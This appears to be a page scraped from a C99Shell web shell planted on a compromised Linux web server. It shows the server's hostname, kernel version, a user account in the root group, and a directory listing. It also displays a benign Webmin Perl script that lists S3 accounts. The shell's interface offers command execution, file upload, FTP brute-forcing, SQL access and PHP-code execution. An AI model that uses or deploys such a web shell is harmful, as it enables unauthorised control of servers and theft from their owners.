!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     list_s3s.cgi (1.27 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a list of S3-compatible accounts

require './virtual-server-lib.pl';
&ReadParse();
&can_cloud_providers() || &error($text{'s3s_ecannot'});

&ui_print_header(undef, $text{'s3s_title'}, "", "s3s");

print "<p>",$text{'s3s_longdesc'},"</p>\n";

($err, $warn) = &check_s3();
print &ui_alert_box(&text('s3s_echeck', $err),
            'warn', undef, undef, '') if ($err);
print &ui_alert_box($warn, 'warn') if ($warn);

my @s3s = &list_s3_accounts();
my @scheds = &list_scheduled_backups();
my @links = ( &ui_link("edit_s3.cgi?new=1", $text{'s3s_add'}) );
if (@s3s) {
    print &ui_links_row(\@links);
    print &ui_columns_start([ $text{'s3s_access'},
                  $text{'s3s_desc'},
                  $text{'s3s_endpoint'},
                  $text{'s3s_usedby'} ]);
    foreach my $s3 (@s3s) {
        my @users = grep { &backup_uses_s3_account($_, $s3) } @scheds;
        print &ui_columns_row([
            $s3->{'iam'} ? $text{'s3s_auto'} :
                &ui_link("edit_s3.cgi?id=$s3->{'id'}",
                     $s3->{'access'}),
            $s3->{'desc'},
            &html_escape($s3->{'endpoint'} ||
                     $text{'s3s_endpoint_def'}),
            @users ? &text('s3s_users', scalar(@users))
                   : $text{'s3s_nousers'},
            ]);
        }
    print &ui_columns_end();
    }
else {
    print "<b>$text{'s3s_none'}</b><p>\n";
    }
print &ui_links_row(\@links);

&ui_print_footer("", $text{'index_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--